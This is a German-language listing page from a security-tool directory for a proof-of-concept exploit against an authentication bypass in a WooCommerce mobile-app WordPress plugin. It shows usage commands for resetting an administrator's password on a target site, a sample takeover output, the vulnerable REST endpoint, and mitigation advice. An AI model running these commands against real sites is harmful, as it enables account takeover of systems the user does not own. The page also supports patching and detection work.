Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10580 — PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Authentication & AuthorizationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WordPress

WordPress - Hippoo Mobile App für WooCommerce <= 1.9.4 - Authentifizierungsumgehung zur Admin-Konto-Übernahme

License: MIT

Übersicht

Dieses Tool ist ein Proof-of-Concept-Exploit für CVE-2026-10580, eine Authentifizierungsumgehungs-Schwachstelle, die das Hippoo Mobile App für WooCommerce WordPress-Plugin (Versionen <= 1.9.4) betrifft. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, das Passwort eines beliebigen Benutzers, einschließlich Administratoren, zurückzusetzen, was zur vollständigen Übernahme der Website führt.

⚠️ Wichtig: Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.

Funktionen

  • Ermittelt alle WordPress-Benutzer über den anfälligen REST-API-Endpunkt
  • Setzt das Passwort für eine bestimmte Benutzer-ID zurück (Standard: Admin-ID 1)
  • Einfache Befehlszeilenschnittstelle mit farbiger Ausgabe
  • Option zur Deaktivierung der SSL-Überprüfung für Testumgebungen

Verwendung

Voraussetzungen

  • Python 3.6+
  • requests Bibliothek

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

Grundlegender Befehl

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Optionen

Beispiele

Exploit mit Standard-Admin-ID (1) und SSL-Überprüfung:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Bestimmte Benutzer-ID anvisieren und SSL-Überprüfung deaktivieren:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Ohne Banner ausführen:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Beispielausgabe

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

Gegenmaßnahmen

Wenn Sie das Hippoo-Plugin verwenden, aktualisieren Sie es sofort auf eine gepatchte Version (>1.9.4). Zusätzlich:

  • Überprüfen Sie regelmäßig Benutzerkonten auf unbefugte Änderungen
  • Überwachen Sie Protokolle auf unerwartete API-Anfragen an /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Erwägen Sie die Einschränkung des Zugriffs auf die WordPress-REST-API, falls nicht erforderlich

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert. Siehe LICENSE Datei für Details.

Autor

0xgh057r3c0n

Haftungsausschluss

Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen
ArgumentBeschreibung
-t, --targetZiel-URL der WordPress-Website (z. B. https://example.com)
-p, --passwordNeues Passwort für das Administratorkonto
-i, --idBenutzer-ID für die Übernahme (Standard: 1)
-k, --insecureSSL-Zertifikatsprüfung überspringen
--no-bannerASCII-Banner unterdrücken